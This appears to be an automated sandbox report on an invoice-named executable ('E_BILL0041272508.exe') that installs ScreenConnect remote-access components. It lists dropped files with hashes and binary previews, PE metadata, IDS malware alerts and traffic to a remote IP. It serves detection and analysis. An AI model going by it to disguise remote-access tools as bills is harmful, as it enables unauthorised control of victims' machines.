Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsClient.exe.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Temp\Deployment\L1OYMTWE.Y75\21CVL10Y.PB3\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	87
Entropy (8bit):	3.463057265798253
Encrypted:	false
SSDEEP:	3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
MD5:	D2DED43CE07BFCE4D1C101DFCAA178C8
SHA1:	CE928A1293EA2ACA1AC01B61A344857786AFE509
SHA-256:	8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
SHA-512:	A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
Malicious:	false
Preview:	......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1121
Entropy (8bit):	5.342215969645725
Encrypted:	false
SSDEEP:	24:ML9E4KiE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzetJE4G1qE4j:MxHKiHKnYHKh3oPtHo6hAHKzetJHG1qD
MD5:	4F13BE23AEC301E86C0DE5CB433E8C51
SHA1:	1E2D836615D5F58BE6F783DE3419B72145C67328
SHA-256:	B04CE5777D696BE968DED9C867B6DF301E29727D2C7339F264A6A732E78B2EA4
SHA-512:	C7C9E26407235F2D2165D359407147592BC088BC188AF26548C78D308FEDF6D73A5A383ED88249092A454DBB85C4CEE6050D4874A3B4B927C379980B7F719467
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, Publ

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.514741307956859
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	E_BILL0041272508.exe
File size:	83'352 bytes
MD5:	9ffc98a16aba4841e94b24ccabf219ab
SHA1:	31925b39e3255446a3b0803da2f75337329f6a65
SHA256:	453e8d5897ce07b29bc8df2312686cca8d2df37bcf43b1e7e0d5c8b0ee585a3f
SHA512:	390da771544bc23fd3b00db6dbd78b9b9d2846380cc162af759372e28da3b5ed8c01e380ed538cbe4fdc68269b5e98915e439db85e86792c0ad8a078f5de1484
SSDEEP:	1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYH7IxD:7enkyfPAwiMq0RqRfbaxZJYYH
TLSH:	85835B43B5D18875E9720E3118B1D9B4593FBD110EA48EAF3398426E0F351D19E3AE7B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............\|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x401489
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	37d5c89163970dd3cc69230538a1b72b

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 02:00:00 16/08/2025 01:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007FA051059CDAh
jmp 00007FA05105978Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040B048h]
push dword ptr [ebp+08h]
call dword ptr [0040B044h]
push C0000409h
call dword ptr [0040B04Ch]
push eax
call dword ptr [0040B050h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040B054h]
test eax, eax
je 00007FA051059917h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1060c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11800	0x2d98
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14000	0xddc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xfe38	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xfd78	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9cf8	0x9e00	bae4521030709e187bdbe8a34d7bf731	False	0.6035650712025317	data	6.581464957368758	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x5d58	0x5e00	ec94ce6ebdbe57640638e0aa31d08896	False	0.4178025265957447	Applesoft BASIC program data, first line number 1	4.843224204192078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x11cc	0x800	04a548a5c04675d08166d3823a6bf61b	False	0.16357421875	data	2.0120795802951505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x13000	0x1e0	0x200	aa256780346be2e1ee49ac6d69d2faff	False	0.52734375	data	4.703723272345726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14000	0xddc	0xe00	908329e10a1923a3c4938a10d44237d9	False	0.7776227678571429	data	6.495696626464028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x13060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW

CRYPT32.dll

CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T06:25:23.034206+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.6	49723	TCP
2024-10-02T06:25:24.139539+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.6	49725	TCP
2024-10-02T06:25:27.919859+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.6	49730	TCP
2024-10-02T06:25:29.012255+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.6	49731	TCP
2024-10-02T06:25:30.764881+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.6	49734	TCP
2024-10-02T06:25:31.855577+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.6	49736	TCP
2024-10-02T06:25:34.080744+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.6	49737	TCP
2024-10-02T06:25:35.668872+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	79.110.49.16	443	192.168.2.6	49738	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 06:25:15.772679090 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:15.772744894 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:15.775185108 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:15.797631979 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:15.797668934 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.441049099 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.441135883 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.444935083 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.444958925 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.445327044 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.486808062 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.514651060 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.555419922 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.743093967 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.743110895 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.743119001 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.743154049 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.743161917 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.743170023 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.743283033 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.743340015 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.743362904 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.743390083 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.831309080 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.831330061 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.831437111 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.831466913 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.831531048 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.833142042 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.833157063 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.833225965 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.833235025 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.833281994 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.918946981 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.918973923 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.919035912 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.919080973 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.919091940 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.919137001 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.920011044 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.920036077 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.920090914 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.920098066 CEST	443	49714	79.110.49.16	192.168.2.6
Oct 2, 2024 06:25:16.920130014 CEST	49714	443	192.168.2.6	79.110.49.16
Oct 2, 2024 06:25:16.920151949 CEST	49714	443	192.168.2.6	79.110.49.16
